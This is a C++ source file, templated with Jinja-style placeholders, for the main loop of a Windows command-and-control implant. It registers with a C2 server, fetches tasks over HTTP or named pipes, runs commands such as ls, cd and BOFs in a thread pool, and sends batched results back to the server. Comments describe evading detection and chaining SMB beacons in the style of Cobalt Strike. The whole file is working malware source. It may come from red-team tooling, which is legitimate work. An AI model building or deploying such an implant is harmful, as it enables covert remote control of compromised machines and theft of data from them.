#include "c2.h"
#include "../protocols/json/json.h"
#include "../data/msgpack/msgpack.h"
#include "settings.h"
#include "commandtree.h"
#include <windows.h>
#include "../comms/transport.h"
#include <queue>
#include <mutex>
#include <iostream>
#include <thread>
#include <vector>
#include <string>
#include "../data/msgpack/msgpack.h"
// ======================================================================================
// Global Vars (own file?)
// ======================================================================================
// Thread-safe response queue for background workers
// Might be a good idea to toss into its own file
std::queue<nlohmann::json> response_queue;
std::mutex queue_mutex;

// Signals the main loop when a background task completes
HANDLE h_data_ready_event = NULL;

// ======================================================================================
// 1. THREAD POOL WORKER LOGIC (own file?)
// ======================================================================================

VOID CALLBACK TaskHandler(PTP_CALLBACK_INSTANCE Instance, PVOID Context, PTP_WORK Work) {
    // 1. Recover task data from the heap
    nlohmann::json* task_ptr = static_cast<nlohmann::json*>(Context);
    nlohmann::json task_data = *task_ptr;

    // 2. Execute the actual command (ls, cd, bof, etc)
    nlohmann::json result = command_tree(task_data);

    // 3. Ensure the response is linked to the original tasking
    result["task_uuid"] = task_data["task_uuid"];

    // 4. Safely queue the result for the egress transport
    {
        std::lock_guard<std::mutex> lock(queue_mutex);
        response_queue.push(result);
    }

    // 5. Wake up the main cycle() loop to send the response
    SetEvent(h_data_ready_event);

    // 6. Cleanup
    delete task_ptr;
    CloseThreadpoolWork(Work);
}

void C2Implant::dispatch_to_threadpool(const nlohmann::json& task) {
    nlohmann::json* task_context = new nlohmann::json(task);

    PTP_WORK work_item = CreateThreadpoolWork(TaskHandler, task_context, NULL);
    if (work_item) {
        SubmitThreadpoolWork(work_item);
    }
    else {
        delete task_context;
    }
}

// ======================================================================================
// 2. CLASS IMPLEMENTATION
// ======================================================================================

void C2Implant::init() {
    /* template me - append listener names here */
    //declare list of valid get & post strats, for strat commands & strat lookups


    //Load GET Comms values in (templated)
    std::vector<std::string> available_ingress = {};

    [%- for c2_get_profile in get_function_mappings.values() %]
    
    available_ingress.push_back("[[ c2_get_profile.value ]]");
    
    [%- endfor %]


    //Load POST Comms values in (templated)
    std::vector<std::string> available_egress = {};

    [%- for c2_post_profile in post_function_mappings.values() %]
    
    available_egress.push_back("[[ c2_post_profile.value ]]");
    
    [%- endfor %]


    /* endtemplate */

    //update settings with this list
    SettingsManager::instance().set<std::vector<std::string>>("comms_get_strats", available_ingress);
    SettingsManager::instance().set<std::vector<std::string>>("comms_post_strats", available_egress);

    // Set Defaults (templated)
    SettingsManager::instance().set("comms_get_function", "[[ init_get_function ]]");
    SettingsManager::instance().set("comms_post_function", "[[ init_post_function ]]");

    // Initialize the synchronization event
    if (h_data_ready_event == NULL) {
        h_data_ready_event = CreateEventW(NULL, FALSE, FALSE, NULL);
    }
}

int C2Implant::register_implant() {
    std::cout << "[*] Attempting Registration..." << std::endl;

    // Resolve current ingress strategy
    IIngressTransport* ingress = GetCurrentIngress();
    if (!ingress) return -1;

    // Registration uses a "Zero UUID" to signal the server
    nlohmann::json data = ingress->fetch_task("00000000-0000-0000-0000-000000000000");


    //pullout first message, as this is a list too technically.
    //no task uuid on register, just the implant uuid to setup  registration
    if (data.is_array() && !data.empty()) {
        nlohmann::json reg_data = data[0]; // Pop the first item out of the array

        if (reg_data.contains("implant_uuid")) {
            implant_uuid_ = reg_data["implant_uuid"];
            std::cout << "[+] Registered! UUID: " << implant_uuid_ << std::endl;
            SettingsManager::instance().set("registered", 1);
            return 1;
        }
    }

    return -1;
}

void C2Implant::cycle() {
    while (true) {
        IIngressTransport* ingress = GetCurrentIngress();
        IEgressTransport* egress = GetCurrentEgress();

        if (!ingress || !egress) {
            this->sleep_implant();
            continue;
        }

        HANDLE h_in_event = ingress->get_wait_handle();
        DWORD timeout = (h_in_event != NULL) ? INFINITE : (SettingsManager::instance().get<int>("sleep_time", 5) * 1000);

        DWORD result;

        if (h_in_event != NULL) {
            // --- PIPE MODE ---
            // Wait for either the Pipe (Index 0) or the Worker (Index 1)
            HANDLE handles[2] = { h_in_event, h_data_ready_event };
            result = WaitForMultipleObjects(2, handles, FALSE, timeout);
        }
        else {
            // --- HTTP/non handle based comms MODE ---
            // We ONLY wait for the Worker. The "Fetch" happens via the timeout.
            //if no task, this is effectively the sleep. 
            result = WaitForSingleObject(h_data_ready_event, timeout);
        }

        // --- Event Handling/Dispatcher ---
        /*
           This block functions as a state machine that handles the transition
           between Ingress and Egress communication methods

           The dispatcher accounts for the fundamental difference between:
           1. POLL-based (Implant-initiated 'Pull')
            > i.e. HTTP
           2. HANDLE-based (Kernel-signaled 'Push')
            > i.e., Named Pipes

            This adds a bit of complexity to the implant, but also allows
            for protocol switching, and use of handle based methods, like named pipes,
            on every implant.
        */

        // ================================================================================
        // TRIGGER 1: POLL-BASED INGRESS (Wait Timeout)
        // For transports without a kernel handle (HTTP/DNS), the "GET" is triggered 
        // by the expiration of the sleep/jitter timer (via WaitForSingleObject)
        // It's quieter than a Sleep call, and WaitForSingleObject without INFINITE 
        // should hopefully blend in. 
        // ================================================================================
        //if (result == WAIT_TIMEOUT) {
        //    // This ONLY triggers when the 5 seconds pass without a worker finishing.
        //    // It ensures we consistently "GET" even if we haven't just "POSTed" something.
        //    nlohmann::json task = ingress->fetch_task(implant_uuid_);
        //    if (!task.is_null() && task.contains("task_uuid")) {
        //        dispatch_to_threadpool(task);
        //    }
        //}
        if (result == WAIT_TIMEOUT) {
            nlohmann::json incoming = ingress->fetch_task(implant_uuid_);
            handle_tasks(incoming);

        }
        // ================================================================================
        // TRIGGER 2: HANDLE-BASED INGRESS (Kernel Signal)
        // For transports with a kernel handle (Pipes/Sockets), the Windows Kernel 
        // signals this thread as soon as data arrives, bypassing the need for a timer/polling.
        // ex, parent implant writes task to our SMB inbox pipe
        // ================================================================================
        /*
        Quick note - smb/handle beacons act whenever they get data. It's my understanding
        this is "fine", as:
        1. you already have a foothold and data is (presumably) not leaving the network
            > unless someone is fucking crazy, has SMB open on their external FW, you
              run an implant on your own host, and point that implant at the SMB child Implant
              through that FW.

        2. It adds a lot of delay with chained beacons, if every single one has it's own sleep
        timer to wait for.

        It also appears (from playing with Cobalt Beacons) that they operate in "realtime" over
        SMB anyways, so if they can do it so can we?

        Who knows. Just something to be aware of.

        */
        else if (h_in_event != NULL && result == WAIT_OBJECT_0) {
            nlohmann::json incoming = ingress->fetch_task(implant_uuid_);
            handle_tasks(incoming);
        }

        // ================================================================================
        // TRIGGER 3: WORKER COMPLETION (Internal Signal)
        // Regardless of the ingress method, this triggers when a background worker 
        // finishes a command and places the result in the response_queue. This is our 
        // (literal) signal to send back our data. 
        // ================================================================================
        else if (result == WAIT_OBJECT_0 || (h_in_event != NULL && result == WAIT_OBJECT_0 + 1)) {
            std::lock_guard<std::mutex> lock(queue_mutex);
            if (!response_queue.empty()) {
                std::vector<uint8_t> batched_buffer;

                // Drain the queue and pack it into a single MsgPack buffer
                //Ex: [{task_uuid:1234},{task_uuid:12345} ] -> bytes of msgpack
                if (create_batched_task_response(implant_uuid_, response_queue, batched_buffer) == 0) {
                    //todo: update signature of send_response
                    egress->send_response(implant_uuid_, batched_buffer);
                }

            } //lock goes out of scope here, and unlocks
        }
    }
}

void C2Implant::sleep_implant() {
    int sleep_time = SettingsManager::instance().get<int>("sleep_time", 5);
    std::this_thread::sleep_for(std::chrono::milliseconds(sleep_time * 1000));
}


//Helper to handle tasks 
void C2Implant::handle_tasks(const nlohmann::json& incoming) {
    // Handle HTTP 204/40X / Empty Pipes
    if (incoming.is_null()) {
        std::cout << "No tasks" << std::endl;
        return; // Nothing to do, go back to sleep/wait
    }

    // Handle task array
    if (incoming.is_array()) {
        std::cout << "Task List recieved" << std::endl;

        for (const auto& task : incoming) {
            // Safety check: Does it have the required routing data?
            if (!task.is_null() && task.contains("implant_uuid") && task.contains("task_uuid")) {

                // If it's our UUID, process it
                if (task["implant_uuid"] == this->implant_uuid_) {
                    dispatch_to_threadpool(task);
                }
                // Otherwise, route it down the chain
                else {
                    // route_to_child_beacon(task);
                    continue;
                }
            }
        }
    }
    // Fallback: Just in case the server accidentally sends a single object instead of a list
    // it should never do this. Keeping as dev code just in case.
    //else if (incoming.is_object()) {
    //    if (incoming.contains("implant_uuid") && incoming.contains("task_uuid")) {
    //        if (incoming["implant_uuid"] == this->implant_uuid_) {
    //            dispatch_to_threadpool(incoming);
    //        }
    //    }
    //}
}